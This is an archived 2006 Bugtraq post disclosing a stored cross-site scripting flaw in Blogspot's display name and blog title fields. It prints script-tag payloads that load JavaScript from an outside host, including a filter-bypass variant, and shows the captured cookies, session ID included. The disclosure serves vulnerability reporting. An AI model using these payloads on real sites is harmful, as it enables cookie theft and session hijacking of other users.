lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 14 Jun 2006 08:50:05 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Blogspot.com - XSS with cookie disclosure


Blogspot.com

Homepage:
http://www.blogspot.com

Affected files:

Blog input boxes
------------------------------------------

XSS vuln via Display name input box.

Blogger doesnt properally sanatize user input before generating it. For example, you can't use illegal characters in your username,or password, but for a "Display name", theyre allowed. Also, in Blog title, you can use them.

For a PoC in the display name box try putting:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

When you visit your blog at http://whatever.blogspot.com, you'll see the code printedon the page, however it works. If you were to use a img tag as your display name, the image would be displayed.


And to bypass the not allowed html filter, we put the numerical equivlent of < before the actual tag, as well as &gt; after the tag

<&lt;SCRIPT SRC=http://ha.ckers.org/xss.js>&gt;

With that code above you'll notice your cookie data has popped up. Awesome huh? Below the screenshot & cookie data:


Our cookie:

This is remote text via xss.js located at ha.ckers.org NSC_cmphhfs-fyu=0a1401230050; JSESSIONID=41EF1903DD571793A2D29B41CCED8834; ServerID=1315; hlSession=en; hl=en; __utma=150635877.44768819.1150269380.1150269380.
1150269380.1; __utmb=150635877; __utmc=150635877; __utmz=150635877.1150269380.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); NSC_cmphhfs-fyu=0a1401030050;I=SWgFh0wsBAAA=.hCANmCIpgh6067BRKRqqmg==.a+/bxnhvdaZFY6bOWAk5wQ==; B1I=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E& 


Screenshots:
http://www.youfucktard.com/xsp/blogspot1.jpg
http://www.youfucktard.com/xsp/blogspot2.jpg


Example blogs with the vuln inplanted:
http://ghgfde3.blogspot.com/
(NSFW) http://botguy.blogspot.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ